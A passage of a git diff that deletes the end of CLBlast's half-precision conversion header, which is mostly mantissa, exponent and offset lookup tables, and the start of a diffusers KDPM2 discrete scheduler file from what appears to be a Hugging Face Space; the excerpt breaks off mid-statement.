0x3814C000, 0x38150000, 0x38154000, 0x38158000, 0x3815C000, 0x38160000, 0x38164000, 0x38168000, 0x3816C000, 0x38170000, 0x38174000, 0x38178000, 0x3817C000, - 0x38180000, 0x38184000, 0x38188000, 0x3818C000, 0x38190000, 0x38194000, 0x38198000, 0x3819C000, 0x381A0000, 0x381A4000, 0x381A8000, 0x381AC000, 0x381B0000, 0x381B4000, 0x381B8000, 0x381BC000, - 0x381C0000, 0x381C4000, 0x381C8000, 0x381CC000, 0x381D0000, 0x381D4000, 0x381D8000, 0x381DC000, 0x381E0000, 0x381E4000, 0x381E8000, 0x381EC000, 0x381F0000, 0x381F4000, 0x381F8000, 0x381FC000, - 0x38200000, 0x38204000, 0x38208000, 0x3820C000, 0x38210000, 0x38214000, 0x38218000, 0x3821C000, 0x38220000, 0x38224000, 0x38228000, 0x3822C000, 0x38230000, 0x38234000, 0x38238000, 0x3823C000, - 0x38240000, 0x38244000, 0x38248000, 0x3824C000, 0x38250000, 0x38254000, 0x38258000, 0x3825C000, 0x38260000, 0x38264000, 0x38268000, 0x3826C000, 0x38270000, 0x38274000, 0x38278000, 0x3827C000, - 0x38280000, 0x38284000, 0x38288000, 0x3828C000, 0x38290000, 0x38294000, 0x38298000, 0x3829C000, 0x382A0000, 0x382A4000, 0x382A8000, 0x382AC000, 0x382B0000, 0x382B4000, 0x382B8000, 0x382BC000, - 0x382C0000, 0x382C4000, 0x382C8000, 0x382CC000, 0x382D0000, 0x382D4000, 0x382D8000, 0x382DC000, 0x382E0000, 0x382E4000, 0x382E8000, 0x382EC000, 0x382F0000, 0x382F4000, 0x382F8000, 0x382FC000, - 0x38300000, 0x38304000, 0x38308000, 0x3830C000, 0x38310000, 0x38314000, 0x38318000, 0x3831C000, 0x38320000, 0x38324000, 0x38328000, 0x3832C000, 0x38330000, 0x38334000, 0x38338000, 0x3833C000, - 0x38340000, 0x38344000, 0x38348000, 0x3834C000, 0x38350000, 0x38354000, 0x38358000, 0x3835C000, 0x38360000, 0x38364000, 0x38368000, 0x3836C000, 0x38370000, 0x38374000, 0x38378000, 0x3837C000, - 0x38380000, 0x38384000, 0x38388000, 0x3838C000, 0x38390000, 0x38394000, 0x38398000, 0x3839C000, 0x383A0000, 0x383A4000, 0x383A8000, 0x383AC000, 0x383B0000, 0x383B4000, 0x383B8000, 0x383BC000, - 0x383C0000, 0x383C4000, 0x383C8000, 0x383CC000, 0x383D0000, 0x383D4000, 0x383D8000, 0x383DC000, 0x383E0000, 0x383E4000, 0x383E8000, 0x383EC000, 0x383F0000, 0x383F4000, 0x383F8000, 0x383FC000, - 0x38400000, 0x38404000, 0x38408000, 0x3840C000, 0x38410000, 0x38414000, 0x38418000, 0x3841C000, 0x38420000, 0x38424000, 0x38428000, 0x3842C000, 0x38430000, 0x38434000, 0x38438000, 0x3843C000, - 0x38440000, 0x38444000, 0x38448000, 0x3844C000, 0x38450000, 0x38454000, 0x38458000, 0x3845C000, 0x38460000, 0x38464000, 0x38468000, 0x3846C000, 0x38470000, 0x38474000, 0x38478000, 0x3847C000, - 0x38480000, 0x38484000, 0x38488000, 0x3848C000, 0x38490000, 0x38494000, 0x38498000, 0x3849C000, 0x384A0000, 0x384A4000, 0x384A8000, 0x384AC000, 0x384B0000, 0x384B4000, 0x384B8000, 0x384BC000, - 0x384C0000, 0x384C4000, 0x384C8000, 0x384CC000, 0x384D0000, 0x384D4000, 0x384D8000, 0x384DC000, 0x384E0000, 0x384E4000, 0x384E8000, 0x384EC000, 0x384F0000, 0x384F4000, 0x384F8000, 0x384FC000, - 0x38500000, 0x38504000, 0x38508000, 0x3850C000, 0x38510000, 0x38514000, 0x38518000, 0x3851C000, 0x38520000, 0x38524000, 0x38528000, 0x3852C000, 0x38530000, 0x38534000, 0x38538000, 0x3853C000, - 0x38540000, 0x38544000, 0x38548000, 0x3854C000, 0x38550000, 0x38554000, 0x38558000, 0x3855C000, 0x38560000, 0x38564000, 0x38568000, 0x3856C000, 0x38570000, 0x38574000, 0x38578000, 0x3857C000, - 0x38580000, 0x38584000, 0x38588000, 0x3858C000, 0x38590000, 0x38594000, 0x38598000, 0x3859C000, 0x385A0000, 0x385A4000, 0x385A8000, 0x385AC000, 0x385B0000, 0x385B4000, 0x385B8000, 0x385BC000, - 0x385C0000, 0x385C4000, 0x385C8000, 0x385CC000, 0x385D0000, 0x385D4000, 0x385D8000, 0x385DC000, 0x385E0000, 0x385E4000, 0x385E8000, 0x385EC000, 0x385F0000, 0x385F4000, 0x385F8000, 0x385FC000, - 0x38600000, 0x38604000, 0x38608000, 0x3860C000, 0x38610000, 0x38614000, 0x38618000, 0x3861C000, 0x38620000, 0x38624000, 0x38628000, 0x3862C000, 0x38630000, 0x38634000, 0x38638000, 0x3863C000, - 0x38640000, 0x38644000, 0x38648000, 0x3864C000, 0x38650000, 0x38654000, 0x38658000, 0x3865C000, 0x38660000, 0x38664000, 0x38668000, 0x3866C000, 0x38670000, 0x38674000, 0x38678000, 0x3867C000, - 0x38680000, 0x38684000, 0x38688000, 0x3868C000, 0x38690000, 0x38694000, 0x38698000, 0x3869C000, 0x386A0000, 0x386A4000, 0x386A8000, 0x386AC000, 0x386B0000, 0x386B4000, 0x386B8000, 0x386BC000, - 0x386C0000, 0x386C4000, 0x386C8000, 0x386CC000, 0x386D0000, 0x386D4000, 0x386D8000, 0x386DC000, 0x386E0000, 0x386E4000, 0x386E8000, 0x386EC000, 0x386F0000, 0x386F4000, 0x386F8000, 0x386FC000, - 0x38700000, 0x38704000, 0x38708000, 0x3870C000, 0x38710000, 0x38714000, 0x38718000, 0x3871C000, 0x38720000, 0x38724000, 0x38728000, 0x3872C000, 0x38730000, 0x38734000, 0x38738000, 0x3873C000, - 0x38740000, 0x38744000, 0x38748000, 0x3874C000, 0x38750000, 0x38754000, 0x38758000, 0x3875C000, 0x38760000, 0x38764000, 0x38768000, 0x3876C000, 0x38770000, 0x38774000, 0x38778000, 0x3877C000, - 0x38780000, 0x38784000, 0x38788000, 0x3878C000, 0x38790000, 0x38794000, 0x38798000, 0x3879C000, 0x387A0000, 0x387A4000, 0x387A8000, 0x387AC000, 0x387B0000, 0x387B4000, 0x387B8000, 0x387BC000, - 0x387C0000, 0x387C4000, 0x387C8000, 0x387CC000, 0x387D0000, 0x387D4000, 0x387D8000, 0x387DC000, 0x387E0000, 0x387E4000, 0x387E8000, 0x387EC000, 0x387F0000, 0x387F4000, 0x387F8000, 0x387FC000, - 0x38000000, 0x38002000, 0x38004000, 0x38006000, 0x38008000, 0x3800A000, 0x3800C000, 0x3800E000, 0x38010000, 0x38012000, 0x38014000, 0x38016000, 0x38018000, 0x3801A000, 0x3801C000, 0x3801E000, - 0x38020000, 0x38022000, 0x38024000, 0x38026000, 0x38028000, 0x3802A000, 0x3802C000, 0x3802E000, 0x38030000, 0x38032000, 0x38034000, 0x38036000, 0x38038000, 0x3803A000, 0x3803C000, 0x3803E000, - 0x38040000, 0x38042000, 0x38044000, 0x38046000, 0x38048000, 0x3804A000, 0x3804C000, 0x3804E000, 0x38050000, 0x38052000, 0x38054000, 0x38056000, 0x38058000, 0x3805A000, 0x3805C000, 0x3805E000, - 0x38060000, 0x38062000, 0x38064000, 0x38066000, 0x38068000, 0x3806A000, 0x3806C000, 0x3806E000, 0x38070000, 0x38072000, 0x38074000, 0x38076000, 0x38078000, 0x3807A000, 0x3807C000, 0x3807E000, - 0x38080000, 0x38082000, 0x38084000, 0x38086000, 0x38088000, 0x3808A000, 0x3808C000, 0x3808E000, 0x38090000, 0x38092000, 0x38094000, 0x38096000, 0x38098000, 0x3809A000, 0x3809C000, 0x3809E000, - 0x380A0000, 0x380A2000, 0x380A4000, 0x380A6000, 0x380A8000, 0x380AA000, 0x380AC000, 0x380AE000, 0x380B0000, 0x380B2000, 0x380B4000, 0x380B6000, 0x380B8000, 0x380BA000, 0x380BC000, 0x380BE000, - 0x380C0000, 0x380C2000, 0x380C4000, 0x380C6000, 0x380C8000, 0x380CA000, 0x380CC000, 0x380CE000, 0x380D0000, 0x380D2000, 0x380D4000, 0x380D6000, 0x380D8000, 0x380DA000, 0x380DC000, 0x380DE000, - 0x380E0000, 0x380E2000, 0x380E4000, 0x380E6000, 0x380E8000, 0x380EA000, 0x380EC000, 0x380EE000, 0x380F0000, 0x380F2000, 0x380F4000, 0x380F6000, 0x380F8000, 0x380FA000, 0x380FC000, 0x380FE000, - 0x38100000, 0x38102000, 0x38104000, 0x38106000, 0x38108000, 0x3810A000, 0x3810C000, 0x3810E000, 0x38110000, 0x38112000, 0x38114000, 0x38116000, 0x38118000, 0x3811A000, 0x3811C000, 0x3811E000, - 0x38120000, 0x38122000, 0x38124000, 0x38126000, 0x38128000, 0x3812A000, 0x3812C000, 0x3812E000, 0x38130000, 0x38132000, 0x38134000, 0x38136000, 0x38138000, 0x3813A000, 0x3813C000, 0x3813E000, - 0x38140000, 0x38142000, 0x38144000, 0x38146000, 0x38148000, 0x3814A000, 0x3814C000, 0x3814E000, 0x38150000, 0x38152000, 0x38154000, 0x38156000, 0x38158000, 0x3815A000, 0x3815C000, 0x3815E000, - 0x38160000, 0x38162000, 0x38164000, 0x38166000, 0x38168000, 0x3816A000, 0x3816C000, 0x3816E000, 0x38170000, 0x38172000, 0x38174000, 0x38176000, 0x38178000, 0x3817A000, 0x3817C000, 0x3817E000, - 0x38180000, 0x38182000, 0x38184000, 0x38186000, 0x38188000, 0x3818A000, 0x3818C000, 0x3818E000, 0x38190000, 0x38192000, 0x38194000, 0x38196000, 0x38198000, 0x3819A000, 0x3819C000, 0x3819E000, - 0x381A0000, 0x381A2000, 0x381A4000, 0x381A6000, 0x381A8000, 0x381AA000, 0x381AC000, 0x381AE000, 0x381B0000, 0x381B2000, 0x381B4000, 0x381B6000, 0x381B8000, 0x381BA000, 0x381BC000, 0x381BE000, - 0x381C0000, 0x381C2000, 0x381C4000, 0x381C6000, 0x381C8000, 0x381CA000, 0x381CC000, 0x381CE000, 0x381D0000, 0x381D2000, 0x381D4000, 0x381D6000, 0x381D8000, 0x381DA000, 0x381DC000, 0x381DE000, - 0x381E0000, 0x381E2000, 0x381E4000, 0x381E6000, 0x381E8000, 0x381EA000, 0x381EC000, 0x381EE000, 0x381F0000, 0x381F2000, 0x381F4000, 0x381F6000, 0x381F8000, 0x381FA000, 0x381FC000, 0x381FE000, - 0x38200000, 0x38202000, 0x38204000, 0x38206000, 0x38208000, 0x3820A000, 0x3820C000, 0x3820E000, 0x38210000, 0x38212000, 0x38214000, 0x38216000, 0x38218000, 0x3821A000, 0x3821C000, 0x3821E000, - 0x38220000, 0x38222000, 0x38224000, 0x38226000, 0x38228000, 0x3822A000, 0x3822C000, 0x3822E000, 0x38230000, 0x38232000, 0x38234000, 0x38236000, 0x38238000, 0x3823A000, 0x3823C000, 0x3823E000, - 0x38240000, 0x38242000, 0x38244000, 0x38246000, 0x38248000, 0x3824A000, 0x3824C000, 0x3824E000, 0x38250000, 0x38252000, 0x38254000, 0x38256000, 0x38258000, 0x3825A000, 0x3825C000, 0x3825E000, - 0x38260000, 0x38262000, 0x38264000, 0x38266000, 0x38268000, 0x3826A000, 0x3826C000, 0x3826E000, 0x38270000, 0x38272000, 0x38274000, 0x38276000, 0x38278000, 0x3827A000, 0x3827C000, 0x3827E000, - 0x38280000, 0x38282000, 0x38284000, 0x38286000, 0x38288000, 0x3828A000, 0x3828C000, 0x3828E000, 0x38290000, 0x38292000, 0x38294000, 0x38296000, 0x38298000, 0x3829A000, 0x3829C000, 0x3829E000, - 0x382A0000, 0x382A2000, 0x382A4000, 0x382A6000, 0x382A8000, 0x382AA000, 0x382AC000, 0x382AE000, 0x382B0000, 0x382B2000, 0x382B4000, 0x382B6000, 0x382B8000, 0x382BA000, 0x382BC000, 0x382BE000, - 0x382C0000, 0x382C2000, 0x382C4000, 0x382C6000, 0x382C8000, 0x382CA000, 0x382CC000, 0x382CE000, 0x382D0000, 0x382D2000, 0x382D4000, 0x382D6000, 0x382D8000, 0x382DA000, 0x382DC000, 0x382DE000, - 0x382E0000, 0x382E2000, 0x382E4000, 0x382E6000, 0x382E8000, 0x382EA000, 0x382EC000, 0x382EE000, 0x382F0000, 0x382F2000, 0x382F4000, 0x382F6000, 0x382F8000, 0x382FA000, 0x382FC000, 0x382FE000, - 0x38300000, 0x38302000, 0x38304000, 0x38306000, 0x38308000, 0x3830A000, 0x3830C000, 0x3830E000, 0x38310000, 0x38312000, 0x38314000, 0x38316000, 0x38318000, 0x3831A000, 0x3831C000, 0x3831E000, - 0x38320000, 0x38322000, 0x38324000, 0x38326000, 0x38328000, 0x3832A000, 0x3832C000, 0x3832E000, 0x38330000, 0x38332000, 0x38334000, 0x38336000, 0x38338000, 0x3833A000, 0x3833C000, 0x3833E000, - 0x38340000, 0x38342000, 0x38344000, 0x38346000, 0x38348000, 0x3834A000, 0x3834C000, 0x3834E000, 0x38350000, 0x38352000, 0x38354000, 0x38356000, 0x38358000, 0x3835A000, 0x3835C000, 0x3835E000, - 0x38360000, 0x38362000, 0x38364000, 0x38366000, 0x38368000, 0x3836A000, 0x3836C000, 0x3836E000, 0x38370000, 0x38372000, 0x38374000, 0x38376000, 0x38378000, 0x3837A000, 0x3837C000, 0x3837E000, - 0x38380000, 0x38382000, 0x38384000, 0x38386000, 0x38388000, 0x3838A000, 0x3838C000, 0x3838E000, 0x38390000, 0x38392000, 0x38394000, 0x38396000, 0x38398000, 0x3839A000, 0x3839C000, 0x3839E000, - 0x383A0000, 0x383A2000, 0x383A4000, 0x383A6000, 0x383A8000, 0x383AA000, 0x383AC000, 0x383AE000, 0x383B0000, 0x383B2000, 0x383B4000, 0x383B6000, 0x383B8000, 0x383BA000, 0x383BC000, 0x383BE000, - 0x383C0000, 0x383C2000, 0x383C4000, 0x383C6000, 0x383C8000, 0x383CA000, 0x383CC000, 0x383CE000, 0x383D0000, 0x383D2000, 0x383D4000, 0x383D6000, 0x383D8000, 0x383DA000, 0x383DC000, 0x383DE000, - 0x383E0000, 0x383E2000, 0x383E4000, 0x383E6000, 0x383E8000, 0x383EA000, 0x383EC000, 0x383EE000, 0x383F0000, 0x383F2000, 0x383F4000, 0x383F6000, 0x383F8000, 0x383FA000, 0x383FC000, 0x383FE000, - 0x38400000, 0x38402000, 0x38404000, 0x38406000, 0x38408000, 0x3840A000, 0x3840C000, 0x3840E000, 0x38410000, 0x38412000, 0x38414000, 0x38416000, 0x38418000, 0x3841A000, 0x3841C000, 0x3841E000, - 0x38420000, 0x38422000, 0x38424000, 0x38426000, 0x38428000, 0x3842A000, 0x3842C000, 0x3842E000, 0x38430000, 0x38432000, 0x38434000, 0x38436000, 0x38438000, 0x3843A000, 0x3843C000, 0x3843E000, - 0x38440000, 0x38442000, 0x38444000, 0x38446000, 0x38448000, 0x3844A000, 0x3844C000, 0x3844E000, 0x38450000, 0x38452000, 0x38454000, 0x38456000, 0x38458000, 0x3845A000, 0x3845C000, 0x3845E000, - 0x38460000, 0x38462000, 0x38464000, 0x38466000, 0x38468000, 0x3846A000, 0x3846C000, 0x3846E000, 0x38470000, 0x38472000, 0x38474000, 0x38476000, 0x38478000, 0x3847A000, 0x3847C000, 0x3847E000, - 0x38480000, 0x38482000, 0x38484000, 0x38486000, 0x38488000, 0x3848A000, 0x3848C000, 0x3848E000, 0x38490000, 0x38492000, 0x38494000, 0x38496000, 0x38498000, 0x3849A000, 0x3849C000, 0x3849E000, - 0x384A0000, 0x384A2000, 0x384A4000, 0x384A6000, 0x384A8000, 0x384AA000, 0x384AC000, 0x384AE000, 0x384B0000, 0x384B2000, 0x384B4000, 0x384B6000, 0x384B8000, 0x384BA000, 0x384BC000, 0x384BE000, - 0x384C0000, 0x384C2000, 0x384C4000, 0x384C6000, 0x384C8000, 0x384CA000, 0x384CC000, 0x384CE000, 0x384D0000, 0x384D2000, 0x384D4000, 0x384D6000, 0x384D8000, 0x384DA000, 0x384DC000, 0x384DE000, - 0x384E0000, 0x384E2000, 0x384E4000, 0x384E6000, 0x384E8000, 0x384EA000, 0x384EC000, 0x384EE000, 0x384F0000, 0x384F2000, 0x384F4000, 0x384F6000, 0x384F8000, 0x384FA000, 0x384FC000, 0x384FE000, - 0x38500000, 0x38502000, 0x38504000, 0x38506000, 0x38508000, 0x3850A000, 0x3850C000, 0x3850E000, 0x38510000, 0x38512000, 0x38514000, 0x38516000, 0x38518000, 0x3851A000, 0x3851C000, 0x3851E000, - 0x38520000, 0x38522000, 0x38524000, 0x38526000, 0x38528000, 0x3852A000, 0x3852C000, 0x3852E000, 0x38530000, 0x38532000, 0x38534000, 0x38536000, 0x38538000, 0x3853A000, 0x3853C000, 0x3853E000, - 0x38540000, 0x38542000, 0x38544000, 0x38546000, 0x38548000, 0x3854A000, 0x3854C000, 0x3854E000, 0x38550000, 0x38552000, 0x38554000, 0x38556000, 0x38558000, 0x3855A000, 0x3855C000, 0x3855E000, - 0x38560000, 0x38562000, 0x38564000, 0x38566000, 0x38568000, 0x3856A000, 0x3856C000, 0x3856E000, 0x38570000, 0x38572000, 0x38574000, 0x38576000, 0x38578000, 0x3857A000, 0x3857C000, 0x3857E000, - 0x38580000, 0x38582000, 0x38584000, 0x38586000, 0x38588000, 0x3858A000, 0x3858C000, 0x3858E000, 0x38590000, 0x38592000, 0x38594000, 0x38596000, 0x38598000, 0x3859A000, 0x3859C000, 0x3859E000, - 0x385A0000, 0x385A2000, 0x385A4000, 0x385A6000, 0x385A8000, 0x385AA000, 0x385AC000, 0x385AE000, 0x385B0000, 0x385B2000, 0x385B4000, 0x385B6000, 0x385B8000, 0x385BA000, 0x385BC000, 0x385BE000, - 0x385C0000, 0x385C2000, 0x385C4000, 0x385C6000, 0x385C8000, 0x385CA000, 0x385CC000, 0x385CE000, 0x385D0000, 0x385D2000, 0x385D4000, 0x385D6000, 0x385D8000, 0x385DA000, 0x385DC000, 0x385DE000, - 0x385E0000, 0x385E2000, 0x385E4000, 0x385E6000, 0x385E8000, 0x385EA000, 0x385EC000, 0x385EE000, 0x385F0000, 0x385F2000, 0x385F4000, 0x385F6000, 0x385F8000, 0x385FA000, 0x385FC000, 0x385FE000, - 0x38600000, 0x38602000, 0x38604000, 0x38606000, 0x38608000, 0x3860A000, 0x3860C000, 0x3860E000, 0x38610000, 0x38612000, 0x38614000, 0x38616000, 0x38618000, 0x3861A000, 0x3861C000, 0x3861E000, - 0x38620000, 0x38622000, 0x38624000, 0x38626000, 0x38628000, 0x3862A000, 0x3862C000, 0x3862E000, 0x38630000, 0x38632000, 0x38634000, 0x38636000, 0x38638000, 0x3863A000, 0x3863C000, 0x3863E000, - 0x38640000, 0x38642000, 0x38644000, 0x38646000, 0x38648000, 0x3864A000, 0x3864C000, 0x3864E000, 0x38650000, 0x38652000, 0x38654000, 0x38656000, 0x38658000, 0x3865A000, 0x3865C000, 0x3865E000, - 0x38660000, 0x38662000, 0x38664000, 0x38666000, 0x38668000, 0x3866A000, 0x3866C000, 0x3866E000, 0x38670000, 0x38672000, 0x38674000, 0x38676000, 0x38678000, 0x3867A000, 0x3867C000, 0x3867E000, - 0x38680000, 0x38682000, 0x38684000, 0x38686000, 0x38688000, 0x3868A000, 0x3868C000, 0x3868E000, 0x38690000, 0x38692000, 0x38694000, 0x38696000, 0x38698000, 0x3869A000, 0x3869C000, 0x3869E000, - 0x386A0000, 0x386A2000, 0x386A4000, 0x386A6000, 0x386A8000, 0x386AA000, 0x386AC000, 0x386AE000, 0x386B0000, 0x386B2000, 0x386B4000, 0x386B6000, 0x386B8000, 0x386BA000, 0x386BC000, 0x386BE000, - 0x386C0000, 0x386C2000, 0x386C4000, 0x386C6000, 0x386C8000, 0x386CA000, 0x386CC000, 0x386CE000, 0x386D0000, 0x386D2000, 0x386D4000, 0x386D6000, 0x386D8000, 0x386DA000, 0x386DC000, 0x386DE000, - 0x386E0000, 0x386E2000, 0x386E4000, 0x386E6000, 0x386E8000, 0x386EA000, 0x386EC000, 0x386EE000, 0x386F0000, 0x386F2000, 0x386F4000, 0x386F6000, 0x386F8000, 0x386FA000, 0x386FC000, 0x386FE000, - 0x38700000, 0x38702000, 0x38704000, 0x38706000, 0x38708000, 0x3870A000, 0x3870C000, 0x3870E000, 0x38710000, 0x38712000, 0x38714000, 0x38716000, 0x38718000, 0x3871A000, 0x3871C000, 0x3871E000, - 0x38720000, 0x38722000, 0x38724000, 0x38726000, 0x38728000, 0x3872A000, 0x3872C000, 0x3872E000, 0x38730000, 0x38732000, 0x38734000, 0x38736000, 0x38738000, 0x3873A000, 0x3873C000, 0x3873E000, - 0x38740000, 0x38742000, 0x38744000, 0x38746000, 0x38748000, 0x3874A000, 0x3874C000, 0x3874E000, 0x38750000, 0x38752000, 0x38754000, 0x38756000, 0x38758000, 0x3875A000, 0x3875C000, 0x3875E000, - 0x38760000, 0x38762000, 0x38764000, 0x38766000, 0x38768000, 0x3876A000, 0x3876C000, 0x3876E000, 0x38770000, 0x38772000, 0x38774000, 0x38776000, 0x38778000, 0x3877A000, 0x3877C000, 0x3877E000, - 0x38780000, 0x38782000, 0x38784000, 0x38786000, 0x38788000, 0x3878A000, 0x3878C000, 0x3878E000, 0x38790000, 0x38792000, 0x38794000, 0x38796000, 0x38798000, 0x3879A000, 0x3879C000, 0x3879E000, - 0x387A0000, 0x387A2000, 0x387A4000, 0x387A6000, 0x387A8000, 0x387AA000, 0x387AC000, 0x387AE000, 0x387B0000, 0x387B2000, 0x387B4000, 0x387B6000, 0x387B8000, 0x387BA000, 0x387BC000, 0x387BE000, - 0x387C0000, 0x387C2000, 0x387C4000, 0x387C6000, 0x387C8000, 0x387CA000, 0x387CC000, 0x387CE000, 0x387D0000, 0x387D2000, 0x387D4000, 0x387D6000, 0x387D8000, 0x387DA000, 0x387DC000, 0x387DE000, - 0x387E0000, 0x387E2000, 0x387E4000, 0x387E6000, 0x387E8000, 0x387EA000, 0x387EC000, 0x387EE000, 0x387F0000, 0x387F2000, 0x387F4000, 0x387F6000, 0x387F8000, 0x387FA000, 0x387FC000, 0x387FE000 - }; - static const unsigned int exponent_table[64] = { - 0x00000000, 0x00800000, 0x01000000, 0x01800000, 0x02000000, 0x02800000, 0x03000000, 0x03800000, 0x04000000, 0x04800000, 0x05000000, 0x05800000, 0x06000000, 0x06800000, 0x07000000, 0x07800000, - 0x08000000, 0x08800000, 0x09000000, 0x09800000, 0x0A000000, 0x0A800000, 0x0B000000, 0x0B800000, 0x0C000000, 0x0C800000, 0x0D000000, 0x0D800000, 0x0E000000, 0x0E800000, 0x0F000000, 0x47800000, - 0x80000000, 0x80800000, 0x81000000, 0x81800000, 0x82000000, 0x82800000, 0x83000000, 0x83800000, 0x84000000, 0x84800000, 0x85000000, 0x85800000, 0x86000000, 0x86800000, 0x87000000, 0x87800000, - 0x88000000, 0x88800000, 0x89000000, 0x89800000, 0x8A000000, 0x8A800000, 0x8B000000, 0x8B800000, 0x8C000000, 0x8C800000, 0x8D000000, 0x8D800000, 0x8E000000, 0x8E800000, 0x8F000000, 0xC7800000 - }; - static const unsigned short offset_table[64] = { - 0, 1024, 1024, 1024, 1024, 1024, 1024, 1024, 1024, 1024, 1024, 1024, 1024, 1024, 1024, 1024, 1024, 1024, 1024, 1024, 1024, 1024, 1024, 1024, 1024, 1024, 1024, 1024, 1024, 1024, 1024, 1024, - 0, 1024, 1024, 1024, 1024, 1024, 1024, 1024, 1024, 1024, 1024, 1024, 1024, 1024, 1024, 1024, 1024, 1024, 1024, 1024, 1024, 1024, 1024, 1024, 1024, 1024, 1024, 1024, 1024, 1024, 1024, 1024 - }; - ConversionBits bits; - bits.i32 = mantissa_table[offset_table[value >> 10] + (value & 0x3FF)] + - exponent_table[value >> 10]; - return bits.f32; -} - -// ================================================================================================= - -// CLBLAST_HALF_H_ -#endif diff --git a/spaces/Jackflack09/diffuse-custom/diffusers/schedulers/scheduling_k_dpm_2_discrete.py b/spaces/Jackflack09/diffuse-custom/diffusers/schedulers/scheduling_k_dpm_2_discrete.py deleted file mode 100644 index 8aee346c574c14d52c6b67a2c2275cedc3f6a2cc..0000000000000000000000000000000000000000 --- a/spaces/Jackflack09/diffuse-custom/diffusers/schedulers/scheduling_k_dpm_2_discrete.py +++ /dev/null @@ -1,299 +0,0 @@ -# Copyright 2022 Katherine Crowson, The HuggingFace Team and hlky. All rights reserved. -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. - -from typing import List, Optional, Tuple, Union - -import numpy as np -import torch - -from ..configuration_utils import ConfigMixin, register_to_config -from ..utils import _COMPATIBLE_STABLE_DIFFUSION_SCHEDULERS -from .scheduling_utils import SchedulerMixin, SchedulerOutput - - -class KDPM2DiscreteScheduler(SchedulerMixin, ConfigMixin): - """ - Scheduler created by @crowsonkb in [k_diffusion](https://github.com/crowsonkb/k-diffusion), see: - https://github.com/crowsonkb/k-diffusion/blob/5b3af030dd83e0297272d861c19477735d0317ec/k_diffusion/sampling.py#L188 - - Scheduler inspired by DPM-Solver-2 and Algorthim 2 from Karras et al. (2022). - - [`~ConfigMixin`] takes care of storing all config attributes that are passed in the scheduler's `__init__` - function, such as `num_train_timesteps`. They can be accessed via `scheduler.config.num_train_timesteps`. - [`SchedulerMixin`] provides general loading and saving functionality via the [`SchedulerMixin.save_pretrained`] and - [`~SchedulerMixin.from_pretrained`] functions. - - Args: - num_train_timesteps (`int`): number of diffusion steps used to train the model. beta_start (`float`): the - starting `beta` value of inference. beta_end (`float`): the final `beta` value. beta_schedule (`str`): - the beta schedule, a mapping from a beta range to a sequence of betas for stepping the model. Choose from - `linear` or `scaled_linear`. - trained_betas (`np.ndarray`, optional): - option to pass an array of betas directly to the constructor to bypass `beta_start`, `beta_end` etc. - options to clip the variance used when adding noise to the denoised sample. Choose from `fixed_small`, - `fixed_small_log`, `fixed_large`, `fixed_large_log`, `learned` or `learned_range`. - prediction_type (`str`, default `epsilon`, optional): - prediction type of the scheduler function, one of `epsilon` (predicting the noise of the diffusion - process), `sample` (directly predicting the noisy sample`) or `v_prediction` (see section 2.4 - https://imagen.research.google/video/paper.pdf) - """ - - _compatibles = _COMPATIBLE_STABLE_DIFFUSION_SCHEDULERS.copy() - order = 2 - - @register_to_config - def __init__( - self, - num_train_timesteps: int = 1000, - beta_start: float = 0.00085, # sensible defaults - beta_end: float = 0.012, - beta_schedule: str = "linear", - trained_betas: Optional[Union[np.ndarray, List[float]]] = None, - prediction_type: str = "epsilon", - ): - if trained_betas is not None: - self.betas = torch.tensor(trained_betas, dtype=torch.float32) - elif beta_schedule == "linear": - self.betas = torch.linspace(beta_start, beta_end, num_train_timesteps, dtype=torch.float32) - elif beta_schedule == "scaled_linear": - # this schedule is very specific to the latent diffusion model. - self.betas = ( - torch.linspace(beta_start**0.5, beta_end**0.5, num_train_timesteps, dtype=torch.float32) ** 2 - ) - else: - raise NotImplementedError(f"{beta_schedule} does is not implemented for {self.__class__}") - - self.alphas = 1.0 - self.betas - self.alphas_cumprod = torch.cumprod(self.alphas, dim=0) - - # set all values - self.set_timesteps(num_train_timesteps, None, num_train_timesteps) - - def index_for_timestep(self, timestep): - indices = (self.timesteps == timestep).nonzero() - if self.state_in_first_order: - pos = -1 - else: - pos = 0 - return indices[pos].item() - - def scale_model_input( - self, - sample: torch.FloatTensor, - timestep: Union[float, torch.FloatTensor], - ) -> torch.FloatTensor: - """ - Args: - Ensures interchangeability with schedulers that need to scale the denoising model input depending on the - current timestep. - sample (`torch.FloatTensor`): input sample timestep (`int`, optional): current timestep - Returns: - `torch.FloatTensor`: scaled input sample - """ - step_index = self.index_for_timestep(timestep) - - if self.state_in_first_order: - sigma = self.sigmas[step_index] - else: - sigma = self.sigmas_interpol[step_index] - - sample = sample / ((sigma**2 + 1) ** 0.5) - return sample - - def set_timesteps( - self, - num_inference_steps: int, - device: Union[str, torch.device] = None, - num_train_timesteps: Optional[int] = None, - ): - """ - Sets the timesteps used for the diffusion chain. Supporting function to be run before inference. - - Args: - num_inference_steps (`int`): - the number of diffusion steps used when generating samples with a pre-trained model. - device (`str` or `torch.device`, optional): - the device to which the timesteps should be moved to. If `None`, the timesteps are not moved. - """ - self.num_inference_steps = num_inference_steps - - num_train_timesteps = num_train_timesteps or self.config.num_train_timesteps - - timesteps = np.linspace(0, num_train_timesteps - 1, num_inference_steps, dtype=float)[::-1].copy() - - sigmas = np.array(((1 - self.alphas_cumprod) / self.alphas_cumprod) ** 0.5) - self.log_sigmas = torch.from_numpy(np.log(sigmas)).to(device) - - sigmas = np.interp(timesteps, np.arange(0, len(sigmas)), sigmas) - sigmas = np.concatenate([sigmas, [0.0]]).astype(np.float32) - sigmas = torch.from_numpy(sigmas).to(device=device) - - # interpolate sigmas - sigmas_interpol = sigmas.log().lerp(sigmas.roll(1).log(), 0.5).exp() - - self.sigmas = torch.cat([sigmas[:1], sigmas[1:].repeat_interleave(2), sigmas[-1:]]) - self.sigmas_interpol = torch.cat( - [sigmas_interpol[:1], sigmas_interpol[1:].repeat_interleave(2), sigmas_interpol[-1:]] - ) - - # standard deviation of the initial noise distribution - self.init_noise_sigma = self.sigmas.max() - - timesteps = torch.from_numpy(timesteps).to(device) - - # interpolate timesteps - timesteps_interpol = self.sigma_to_t(sigmas_interpol).to(device) - interleaved_timesteps = torch.stack((timesteps_interpol[1:-1, None], timesteps[1:, None]), dim=-1).flatten() - timesteps = torch.cat([timesteps[:1], interleaved_timesteps]) - - if 